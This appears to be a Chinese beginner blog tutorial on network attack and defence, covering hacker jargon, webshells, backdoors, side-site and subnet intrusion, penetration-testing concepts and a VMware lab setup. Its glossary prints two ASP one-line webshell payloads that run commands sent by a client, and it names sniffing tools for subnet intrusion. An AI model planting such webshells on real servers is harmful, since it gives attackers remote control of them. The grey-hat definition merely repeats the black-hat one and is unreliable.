网络攻防入门(上)

基础知识科普

黑客、骇客与红客

  • 黑客:通常是指对计算机科学、编程和设计方面具高度理解的人。由英语Hacker音译出来,伴随着计算机和网络的发展而产生和成长。黑客并不是恶意破坏,这是一群纵横于网络上的技术人员,热衷于科技探索,计算机科学研究。在IT圈,Hacker一词无疑是带有正面意义的群体。
  • 骇客:源自英文Hacker,指闯入计算机系统/软件,后来被称为 Cracker 的一类人。他们从事恶意破解商业软件,恶意入侵他人网站等事务。这一类人未必有很高的技术,通常同一些简单的攻击手段去达到一些炫耀、恶作剧、搞破坏的目的。
  • 红客:中国特色产物,最早出现于北约轰炸中国驻南联盟大使馆之后。这些人用自己的技术维护国内网络安全,并对外来的一切攻击进行还击。

白帽子、黑帽子和灰帽子

  • 白帽子:专门研究或者从事网络安全行业的人,通常受雇于各大安全公司,是提高网络、系统安全水平的主要力量。
  • 黑帽子:专门研究木马、操作系统,寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
  • 灰帽子:专门研究木马、操作系统,寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。

专业术语
1、 脚本(asp、php、jsp)

  • 脚本(Script)是批处理文件的延伸,是一种纯文本保存的程序,一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合,在其中可以实现一定的逻辑分支等。
  • 简单地说就是一条条的文字命令,这些文字命令是可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺序执行。因为脚本在执行时多了一道翻译的过程,所以它比二进制程序执行效率要稍低一些。

2、 html(css、js、html)

  • 超文本标记语言,标准通用标记语言下的一个应用,是网页制作必备的编程语言。“超文本”就是指页面内可以包含图片、链接,甚至音乐、程序等非文字元素。

3、 HTTP协议

  • 超文本传输协议(HyperText Transfer Protocol) 是互联网上应用最为广泛的一种网络协议。主要被用于在Web浏览器和网站服务器之间传递信息。 HTTP 是基于 TCP/IP 协议的应用层协议。

4、 CMS(B/S)

  • CMS是 “Content Management System” 的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。

5、 MD5

  • MD5 消息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。MD5 由美国密码学家罗纳德·李维斯特(Ronald Linn Rivest)设计,于1992年公开,用以取代MD4算法。

肉鸡、抓鸡

  • 肉鸡:被黑客入侵并长期驻扎的计算机或者服务器。
  • 抓鸡:利用大量的程序漏洞,使用自动化方式获取肉鸡的行为。

Webshell

  • 通过Web入侵的一种脚本工具,可以据此对网络服务进行一定的控制。

漏洞

  • 硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改、控制等。

一句话【木马】

  • 通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马。
<%eval request ("pass")%>
<%execute (request ("pass"))%>
//request ("pass"):接受客户端提交的数据,pass为执行命令的参数值。
//eval/execute:函数执行客户端命令的内容。

如: PHP的一 句话木马:

 

下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等等的各种功能。

提权

  • 操作系统低权限的账户将自己提升为管理员权限使用的方法。

后门

  • 黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。

跳板

  • 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。

旁站入侵

  • 即同服务器下的网站入侵,入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有: WebRobot、御剑、明小子和web在线查询等。

C段入侵

  • 即同C段下服务器入侵。如目标ip为192.168.1.253入侵192.168.1.*的任意一台机器,然后利用一些黑客工具嗅探获取在网络上传输的各种信息。
  • 常用的工具有:windows下有Cain;UNIX环境下有Sniffit,Snoop,Tcpdump,Dsniff等。

渗透测试

  • 黑盒测试:在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险。
  • 黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(OS、Datebase、 Script 、code、思路、社工)。
  • 白盒测试:相对黑盒测试,白盒测试基本是从内部发起。
  • 灰盒测试
  • 黑白盒的另一种说法:知道源代码和不知道源代码的渗透测试。这时,黑盒测试还是传统的渗透测试,而白盒测试就偏向于代码省计。

APT 攻击

  • Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。
    1、极强的隐蔽性。
    2、潜伏期长,持续性强。
    3、目标性强。

渗透测试的特点

  • 充满挑战与刺激 ---- 不达目的不罢休。
  • 思路与经验积累往往决定成败。
  • 团队

渗透测试流程

渗透测试与入侵的最大区别

  • 渗透测试:更全面地找出服务器的问题,更倾向于保护。
  • 入侵:不择手段地(甚至具有破坏性的)拿到权限。

一般渗透测试流程:
网络攻防入门(上)_第1张图片
网络攻防入门(上)_第2张图片
经验分析

  • 信息搜集是关键
  • 做事不要太心急
  • 多学习,多看源码
  • 平时注意收集 0day
    0day:泛指所有在官方发布该作品之前或者当天,这主要涵盖了影视、软件、游戏、音乐、资料等方面,由一些特别小组以一定的格式打包发布的数码内容。基本上每个0day发布作品中都包含了说明该发布作品的NFO文件,该文件主要包括发布小组的信息、发布作品的信息、破解信息等。
  • 思路很重要

测试环境安装配置

虚拟机篇
网络攻防入门(上)_第3张图片
安装虚拟机、Windows 2003 enterprise 和 windows xp

  • 虚拟机下载地址:链接:https://pan.baidu.com/s/1qfDuFRTI4DrfSd2VwTNrRw ,提取码:8q6w 。
  • windows 2003 enterprise 镜像文件下载地址:
    链接:https://pan.baidu.com/s/1-u4zXqkjDjwUBANgI4mfeA ,提取码:4sa7 。
  • windows xp镜像文件下载链接:https://pan.baidu.com/s/1Go3E9mc5MnOUOMNOuf5C9g ,提取码:dwd9 。
  • windows 2003 enterprise 安装较为容易,XP 的安装参照微信公众号“软件安装管家”的XP安装教程。详细安装步骤不再叙述,可自行百度搜索相关教程。

窗口尺寸自适应
网络攻防入门(上)_第4张图片
VMware Tools 安装

  • VMware Tools是VMware虚拟机中自带的一种增强工具,相当于VirtualBox中的增强功能(Sun VirtualBox Guest Additions),是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。
    网络攻防入门(上)_第5张图片
    虚拟机挂起
    网络攻防入门(上)_第6张图片
    虚拟机导出
    网络攻防入门(上)_第7张图片
    创建快照
  • 快照:基于硬件编程技术的一种,针对内存进行的快速读取技术,常用于硬件开发。简单说就是可以回到拍照时刻的状态。
    网络攻防入门(上)_第8张图片
    进入Unity模式
  • 可以将虚拟机里的窗口拿到真实机(真实还在虚拟机里)。
    网络攻防入门(上)_第9张图片
    网络攻防入门(上)_第10张图片
    设置
    网络攻防入门(上)_第11张图片
    首选项
    网络攻防入门(上)_第12张图片

两台虚拟机的连通(ping)

1、连接到VMnet1交换机(win2003)
网络攻防入门(上)_第13张图片
2、Windows + R 输入 ncpa.cpl,快速打开网卡(win2003)。
网络攻防入门(上)_第14张图片
2、改IP(win2003)。
网络攻防入门(上)_第15张图片
4、XP系统也同样操作,IP需要设为同一网关下即可,例如: 192.168.2.21。
5、操作完成以后,我们来测试一下。
网络攻防入门(上)_第16张图片
网络攻防入门(上)_第17张图片
由于这个过程是双向的,一边能 ping 通,说明另一边也能必定能 ping 通。

两台 win10 计算机的ping:
网络攻防入门(上)_第18张图片

虚拟机的联网

  • 以xp为例(win2003相同)

第一步:
网络攻防入门(上)_第19张图片
第二步:

测试:
网络攻防入门(上)_第20张图片

  • 好啦,本节终于说完了!qwq

如有错误,欢迎指正!

你可能感兴趣的:(网络攻防(隐藏))